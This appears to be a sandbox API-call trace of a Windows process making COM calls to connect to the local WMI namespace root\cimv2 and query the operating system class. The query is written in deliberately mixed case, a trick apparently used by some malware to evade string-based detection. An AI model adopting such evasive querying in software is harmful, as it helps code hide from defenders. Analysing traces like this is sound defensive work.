	[0068.843] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d1b0 | out: puCount=0x350199d1b0*=0x2) returned 0x0
	[0068.843] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d1b0*=0x0, pszText=0x0 | out: puBuffLength=0x350199d1b0*=0x17, pszText=0x0) returned 0x0
	[0068.843] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d1b0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d1b0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.843] CoGetObjectContext (in: riid=0x350199d0e8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199d0e0 | out: ppv=0x350199d0e0*=0x233e121be30) returned 0x0
	[0068.843] IComThreadingInfo:GetCurrentApartmentType (in: This=0x233e121be30, pAptType=0x350199d100 | out: pAptType=0x350199d100*=1) returned 0x0
	[0068.843] IUnknown:QueryInterface (in: This=0x233e121be30, riid=0x233e4523c48*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x350199d208 | out: ppvObject=0x350199d208*=0x0) returned 0x80004002
	[0068.843] IUnknown:Release (This=0x233e121be30) returned 0x2
	[0068.843] CoGetClassObject (in: rclsid=0x233fc685c98*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x350199cd90 | out: ppv=0x350199cd90*=0x233fc704640) returned 0x0
	[0068.843] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704640, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199caa0 | out: ppvObject=0x350199caa0*=0x0) returned 0x80004002
	[0068.843] WbemLocator:IClassFactory:CreateInstance (in: This=0x233fc704640, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199ca88 | out: ppvObject=0x350199ca88*=0x233fc704740) returned 0x0
	[0068.844] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704740, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c990 | out: ppvObject=0x350199c990*=0x233fc704740) returned 0x0
	[0068.844] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704740, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199ca10 | out: ppvObject=0x350199ca10*=0x0) returned 0x80004002
	[0068.844] WbemLocator:IUnknown:AddRef (This=0x233fc704740) returned 0x3
	[0068.844] CoGetContextToken (in: pToken=0x350199c660 | out: pToken=0x350199c660) returned 0x0
	[0068.844] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704740, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c620 | out: ppvObject=0x350199c620*=0x0) returned 0x80004002
	[0068.844] CoGetContextToken (in: pToken=0x350199c630 | out: pToken=0x350199c630) returned 0x0
	[0068.844] WbemLocator:IUnknown:AddRef (This=0x233fc704740) returned 0x4
	[0068.844] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704740, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c748 | out: ppvObject=0x350199c748*=0x0) returned 0x80004002
	[0068.844] WbemLocator:IUnknown:Release (This=0x233fc704740) returned 0x3
	[0068.844] WbemLocator:IUnknown:Release (This=0x233fc704740) returned 0x2
	[0068.844] WbemLocator:IUnknown:Release (This=0x233fc704640) returned 0x0
	[0068.844] WbemLocator:IUnknown:Release (This=0x233fc704740) returned 0x1
	[0068.844] CoGetContextToken (in: pToken=0x350199cc50 | out: pToken=0x350199cc50) returned 0x0
	[0068.844] CoGetContextToken (in: pToken=0x350199cb90 | out: pToken=0x350199cb90) returned 0x0
	[0068.844] WbemLocator:IUnknown:AddRef (This=0x233fc704740) returned 0x2
	[0068.844] WbemLocator:IUnknown:QueryInterface (in: This=0x233fc704740, riid=0x350199ccd0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x350199ccb0 | out: ppvObject=0x350199ccb0*=0x233fc704740) returned 0x0
	[0068.845] WbemLocator:IUnknown:Release (This=0x233fc704740) returned 0x2
	[0068.845] WbemLocator:IUnknown:Release (This=0x233fc704740) returned 0x1
	[0068.845] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d0b0 | out: puCount=0x350199d0b0*=0x2) returned 0x0
	[0068.845] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=8, puBuffLength=0x350199d0b0*=0x0, pszText=0x0 | out: puBuffLength=0x350199d0b0*=0x17, pszText=0x0) returned 0x0
	[0068.845] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=8, puBuffLength=0x350199d0b0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d0b0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.845] CoCreateInstance (in: rclsid=0x7ffbf68f15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbf68f14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x350199cd20 | out: ppv=0x350199cd20*=0x233fc704720) returned 0x0
	[0068.845] WbemLocator:IWbemLocator:ConnectServer (in: This=0x233fc704720, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x350199cfb0 | out: ppNamespace=0x350199cfb0*=0x233fc70b6d0) returned 0x0
	[0068.851] IUnknown:QueryInterface (in: This=0x233fc70b6d0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cb98 | out: ppvObject=0x350199cb98*=0x233fc70dac0) returned 0x0
	[0068.851] IClientSecurity:QueryBlanket (in: This=0x233fc70dac0, pProxy=0x233fc70b6d0, pAuthnSvc=0x350199cb90, pAuthzSvc=0x350199cb8c, pServerPrincName=0x350199cbb8, pAuthnLevel=0x350199cb88, pImpLevel=0x350199cba4, pAuthInfo=0x350199cbc8, pCapabilites=0x350199cba0 | out: pAuthnSvc=0x350199cb90*=0xa, pAuthzSvc=0x350199cb8c*=0x0, pServerPrincName=0x350199cbb8, pAuthnLevel=0x350199cb88*=0x6, pImpLevel=0x350199cba4*=0x3, pAuthInfo=0x350199cbc8, pCapabilites=0x350199cba0*=0x1) returned 0x0
	[0068.851] IUnknown:Release (This=0x233fc70dac0) returned 0x1
	[0068.851] IUnknown:QueryInterface (in: This=0x233fc70b6d0, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cb38 | out: ppvObject=0x350199cb38*=0x233fc70db08) returned 0x0
	[0068.851] IUnknown:QueryInterface (in: This=0x233fc70b6d0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cac8 | out: ppvObject=0x350199cac8*=0x233fc70dac0) returned 0x0
	[0068.851] IClientSecurity:SetBlanket (This=0x233fc70dac0, pProxy=0x233fc70b6d0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0068.851] IUnknown:Release (This=0x233fc70dac0) returned 0x2
	[0068.851] IUnknown:Release (This=0x233fc70db08) returned 0x1
	[0068.851] CoTaskMemFree (pv=0x233fc6500b0) 
	[0068.851] WbemLocator:IUnknown:Release (This=0x233fc704720) returned 0x0
	[0068.851] IUnknown:QueryInterface (in: This=0x233fc70b6d0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c7b0 | out: ppvObject=0x350199c7b0*=0x233fc70db08) returned 0x0
	[0068.851] IUnknown:QueryInterface (in: This=0x233fc70db08, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c830 | out: ppvObject=0x350199c830*=0x0) returned 0x80004002
	[0068.851] IUnknown:QueryInterface (in: This=0x233fc70db08, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c5c8 | out: ppvObject=0x350199c5c8*=0x0) returned 0x80004002
	[0068.852] IUnknown:AddRef (This=0x233fc70db08) returned 0x3
	[0068.852] CoGetContextToken (in: pToken=0x350199c480 | out: pToken=0x350199c480) returned 0x0
	[0068.852] IUnknown:QueryInterface (in: This=0x233fc70db08, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c440 | out: ppvObject=0x350199c440*=0x233fc70d9e8) returned 0x0
	[0068.852] IMarshal:GetUnmarshalClass (in: This=0x233fc70d9e8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c470 | out: pCid=0x350199c470) returned 0x0
	[0068.852] IUnknown:Release (This=0x233fc70d9e8) returned 0x3
	[0068.852] CoGetContextToken (in: pToken=0x350199c450 | out: pToken=0x350199c450) returned 0x0
	[0068.852] IUnknown:AddRef (This=0x233fc70db08) returned 0x4
	[0068.852] IUnknown:QueryInterface (in: This=0x233fc70db08, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c568 | out: ppvObject=0x350199c568*=0x233fc70dad0) returned 0x0
	[0068.852] IUnknown:Release (This=0x233fc70db08) returned 0x4
	[0068.852] IRpcOptions:Query (in: This=0x233fc70dad0, pPrx=0x233fc70db08, dwProperty=2, pdwValue=0x350199c5d8 | out: pdwValue=0x350199c5d8) returned 0x80004002
	[0068.852] IUnknown:Release (This=0x233fc70dad0) returned 0x3
	[0068.852] IUnknown:Release (This=0x233fc70db08) returned 0x2
	[0068.853] CoGetContextToken (in: pToken=0x350199c950 | out: pToken=0x350199c950) returned 0x0
	[0068.853] CoGetContextToken (in: pToken=0x350199c890 | out: pToken=0x350199c890) returned 0x0
	[0068.853] IUnknown:AddRef (This=0x233fc70db08) returned 0x3
	[0068.853] IUnknown:QueryInterface (in: This=0x233fc70db08, riid=0x350199c9d0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x350199c9b0 | out: ppvObject=0x350199c9b0*=0x233fc70b6d0) returned 0x0
	[0068.853] IUnknown:Release (This=0x233fc70db08) returned 0x3
	[0068.853] IUnknown:Release (This=0x233fc70b6d0) returned 0x2
	[0068.853] IUnknown:Release (This=0x233fc70b6d0) returned 0x1
	[0068.853] SysStringLen (param_1=0x0) returned 0x0
	[0068.853] CoGetContextToken (in: pToken=0x350199cfd0 | out: pToken=0x350199cfd0) returned 0x0
	[0068.853] IUnknown:AddRef (This=0x233fc70db08) returned 0x2
	[0068.853] IUnknown:QueryInterface (in: This=0x233fc70db08, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cba0 | out: ppvObject=0x350199cba0*=0x233fc70db08) returned 0x0
	[0068.853] IUnknown:Release (This=0x233fc70db08) returned 0x2
	[0068.853] IUnknown:Release (This=0x233fc70db08) returned 0x1
	[0068.853] CoGetContextToken (in: pToken=0x350199cbf0 | out: pToken=0x350199cbf0) returned 0x0
	[0068.853] CoGetContextToken (in: pToken=0x350199cb30 | out: pToken=0x350199cb30) returned 0x0
	[0068.853] IUnknown:AddRef (This=0x233fc70db08) returned 0x2
	[0068.853] IUnknown:QueryInterface (in: This=0x233fc70db08, riid=0x350199cc70*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x350199cc50 | out: ppvObject=0x350199cc50*=0x233fc70b6d0) returned 0x0
	[0068.854] IUnknown:Release (This=0x233fc70db08) returned 0x2
	[0068.854] IUnknown:AddRef (This=0x233fc70b6d0) returned 0x3
	[0068.854] IWbemServices:ExecQuery (in: This=0x233fc70b6d0, strQueryLanguage="WQL", strQuery="select * from WIN32_OpErAtIngSySTeM", lFlags=16, pCtx=0x0, ppEnum=0x350199d0e8 | out: ppEnum=0x350199d0e8*=0x233fc6f4840) returned 0x0
	[0068.856] IUnknown:QueryInterface (in: This=0x233fc6f4840, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199ccf8 | out: ppvObject=0x350199ccf8*=0x233fc6f4848) returned 0x0
	[0068.856] IClientSecurity:QueryBlanket (in: This=0x233fc6f4848, pProxy=0x233fc6f4840, pAuthnSvc=0x350199ccf0, pAuthzSvc=0x350199ccec, pServerPrincName=0x350199cd18, pAuthnLevel=0x350199cce8, pImpLevel=0x350199cd04, pAuthInfo=0x350199cd28, pCapabilites=0x350199cd00 | out: pAuthnSvc=0x350199ccf0*=0xa, pAuthzSvc=0x350199ccec*=0x0, pServerPrincName=0x350199cd18, pAuthnLevel=0x350199cce8*=0x6, pImpLevel=0x350199cd04*=0x3, pAuthInfo=0x350199cd28, pCapabilites=0x350199cd00*=0x1) returned 0x0
	[0068.856] IUnknown:Release (This=0x233fc6f4848) returned 0x1
	[0068.856] IUnknown:QueryInterface (in: This=0x233fc6f4840, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cc98 | out: ppvObject=0x350199cc98*=0x233fc70d488) returned 0x0
	[0068.856] IUnknown:QueryInterface (in: This=0x233fc6f4840, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cc28 | out: ppvObject=0x350199cc28*=0x233fc6f4848) returned 0x0
	[0068.856] IClientSecurity:SetBlanket (This=0x233fc6f4848, pProxy=0x233fc6f4840, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0068.860] IUnknown:Release (This=0x233fc6f4848) returned 0x2
	[0068.860] IUnknown:Release (This=0x233fc70d488) returned 0x1
	[0068.860] CoTaskMemFree (pv=0x233fc64fbd0) 
	[0068.861] IUnknown:QueryInterface (in: This=0x233fc6f4840, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c8d0 | out: ppvObject=0x350199c8d0*=0x233fc70d488) returned 0x0
	[0068.861] IUnknown:QueryInterface (in: This=0x233fc70d488, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c950 | out: ppvObject=0x350199c950*=0x0) returned 0x80004002
	[0068.861] IUnknown:QueryInterface (in: This=0x233fc70d488, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c6e8 | out: ppvObject=0x350199c6e8*=0x0) returned 0x80004002
	[0068.861] IUnknown:AddRef (This=0x233fc70d488) returned 0x3
	[0068.861] CoGetContextToken (in: pToken=0x350199c5a0 | out: pToken=0x350199c5a0) returned 0x0
	[0068.861] IUnknown:QueryInterface (in: This=0x233fc70d488, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c560 | out: ppvObject=0x350199c560*=0x233fc70d368) returned 0x0
	[0068.861] IMarshal:GetUnmarshalClass (in: This=0x233fc70d368, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c590 | out: pCid=0x350199c590) returned 0x0
	[0068.861] IUnknown:Release (This=0x233fc70d368) returned 0x3
	[0068.862] CoGetContextToken (in: pToken=0x350199c570 | out: pToken=0x350199c570) returned 0x0
	[0068.862] IUnknown:AddRef (This=0x233fc70d488) returned 0x4
	[0068.862] IUnknown:QueryInterface (in: This=0x233fc70d488, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c688 | out: ppvObject=0x350199c688*=0x233fc70d450) returned 0x0
	[0068.862] IUnknown:Release (This=0x233fc70d488) returned 0x4
	[0068.862] IRpcOptions:Query (in: This=0x233fc70d450, pPrx=0x233fc70d488, dwProperty=2, pdwValue=0x350199c6f8 | out: pdwValue=0x350199c6f8) returned 0x80004002
	[0068.862] IUnknown:Release (This=0x233fc70d450) returned 0x3
	[0068.862] IUnknown:Release (This=0x233fc70d488) returned 0x2
	[0068.862] CoGetContextToken (in: pToken=0x350199ca70 | out: pToken=0x350199ca70) returned 0x0
	[0068.862] CoGetContextToken (in: pToken=0x350199c9b0 | out: pToken=0x350199c9b0) returned 0x0
	[0068.862] IUnknown:AddRef (This=0x233fc70d488) returned 0x3
	[0068.862] IUnknown:QueryInterface (in: This=0x233fc70d488, riid=0x350199caf0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x350199cad0 | out: ppvObject=0x350199cad0*=0x233fc6f4840) returned 0x0
	[0068.862] IUnknown:Release (This=0x233fc70d488) returned 0x3
	[0068.862] IUnknown:Release (This=0x233fc6f4840) returned 0x2
	[0068.862] IUnknown:Release (This=0x233fc6f4840) returned 0x1
	[0068.862] IUnknown:Release (This=0x233fc70b6d0) returned 0x2
	[0068.862] SysStringLen (param_1=0x0) returned 0x0
	[0068.862] IWbemPath:GetNamespaceCount (in: This=0x233e3a01cd0, puCount=0x350199d110 | out: puCount=0x350199d110*=0x2) returned 0x0
	[0068.862] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d110*=0x0, pszText=0x0 | out: puBuffLength=0x350199d110*=0x17, pszText=0x0) returned 0x0
	[0068.863] IWbemPath:GetText (in: This=0x233e3a01cd0, lFlags=4, puBuffLength=0x350199d110*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199d110*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.863] CoGetContextToken (in: pToken=0x350199cc90 | out: pToken=0x350199cc90) returned 0x0
	[0068.863] CoGetContextToken (in: pToken=0x350199cbd0 | out: pToken=0x350199cbd0) returned 0x0
	[0068.863] IUnknown:AddRef (This=0x233fc70d488) returned 0x2
	[0068.863] IUnknown:QueryInterface (in: This=0x233fc70d488, riid=0x350199cd10*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x350199ccf0 | out: ppvObject=0x350199ccf0*=0x233fc6f4840) returned 0x0
	[0068.863] IUnknown:Release (This=0x233fc70d488) returned 0x2
	[0068.863] IUnknown:AddRef (This=0x233fc6f4840) returned 0x3
	[0068.863] IEnumWbemClassObject:Clone (in: This=0x233fc6f4840, ppEnum=0x350199d150 | out: ppEnum=0x350199d150*=0x233fc6f46f0) returned 0x0
	[0068.863] IUnknown:QueryInterface (in: This=0x233fc6f46f0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cda8 | out: ppvObject=0x350199cda8*=0x233fc6f46f8) returned 0x0
	[0068.864] IClientSecurity:QueryBlanket (in: This=0x233fc6f46f8, pProxy=0x233fc6f46f0, pAuthnSvc=0x350199cda0, pAuthzSvc=0x350199cd9c, pServerPrincName=0x350199cdc8, pAuthnLevel=0x350199cd98, pImpLevel=0x350199cdb4, pAuthInfo=0x350199cdd8, pCapabilites=0x350199cdb0 | out: pAuthnSvc=0x350199cda0*=0xa, pAuthzSvc=0x350199cd9c*=0x0, pServerPrincName=0x350199cdc8, pAuthnLevel=0x350199cd98*=0x6, pImpLevel=0x350199cdb4*=0x3, pAuthInfo=0x350199cdd8, pCapabilites=0x350199cdb0*=0x1) returned 0x0
	[0068.864] IUnknown:Release (This=0x233fc6f46f8) returned 0x1
	[0068.864] IUnknown:QueryInterface (in: This=0x233fc6f46f0, riid=0x7ffbf68f1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199cd48 | out: ppvObject=0x350199cd48*=0x233fc70d7c8) returned 0x0
	[0068.864] IUnknown:QueryInterface (in: This=0x233fc6f46f0, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199ccd8 | out: ppvObject=0x350199ccd8*=0x233fc6f46f8) returned 0x0
	[0068.864] IClientSecurity:SetBlanket (This=0x233fc6f46f8, pProxy=0x233fc6f46f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0068.864] IUnknown:Release (This=0x233fc6f46f8) returned 0x2
	[0068.864] IUnknown:Release (This=0x233fc70d7c8) returned 0x1
	[0068.864] CoTaskMemFree (pv=0x233fc650080) 
	[0068.865] IUnknown:QueryInterface (in: This=0x233fc6f46f0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c970 | out: ppvObject=0x350199c970*=0x233fc70d7c8) returned 0x0
	[0068.865] IUnknown:QueryInterface (in: This=0x233fc70d7c8, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x350199c9f0 | out: ppvObject=0x350199c9f0*=0x0) returned 0x80004002
	[0068.865] IUnknown:QueryInterface (in: This=0x233fc70d7c8, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x350199c788 | out: ppvObject=0x350199c788*=0x0) returned 0x80004002
	[0068.865] IUnknown:AddRef (This=0x233fc70d7c8) returned 0x3
	[0068.865] CoGetContextToken (in: pToken=0x350199c640 | out: pToken=0x350199c640) returned 0x0
	[0068.865] IUnknown:QueryInterface (in: This=0x233fc70d7c8, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c600 | out: ppvObject=0x350199c600*=0x233fc70d6a8) returned 0x0
	[0068.880] IMarshal:GetUnmarshalClass (in: This=0x233fc70d6a8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x350199c630 | out: pCid=0x350199c630) returned 0x0
	[0068.880] IUnknown:Release (This=0x233fc70d6a8) returned 0x3
	[0068.880] CoGetContextToken (in: pToken=0x350199c610 | out: pToken=0x350199c610) returned 0x0
	[0068.880] IUnknown:AddRef (This=0x233fc70d7c8) returned 0x4
	[0068.880] IUnknown:QueryInterface (in: This=0x233fc70d7c8, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c728 | out: ppvObject=0x350199c728*=0x233fc70d790) returned 0x0
	[0068.880] IUnknown:Release (This=0x233fc70d7c8) returned 0x4
	[0068.880] IRpcOptions:Query (in: This=0x233fc70d790, pPrx=0x233fc70d7c8, dwProperty=2, pdwValue=0x350199c798 | out: pdwValue=0x350199c798) returned 0x80004002
	[0068.880] IUnknown:Release (This=0x233fc70d790) returned 0x3
	[0068.880] IUnknown:Release (This=0x233fc70d7c8) returned 0x2
	[0068.880] CoGetContextToken (in: pToken=0x350199cb10 | out: pToken=0x350199cb10) returned 0x0
	[0068.880] CoGetContextToken (in: pToken=0x350199ca50 | out: pToken=0x350199ca50) returned 0x0
	[0068.880] IUnknown:AddRef (This=0x233fc70d7c8) returned 0x3
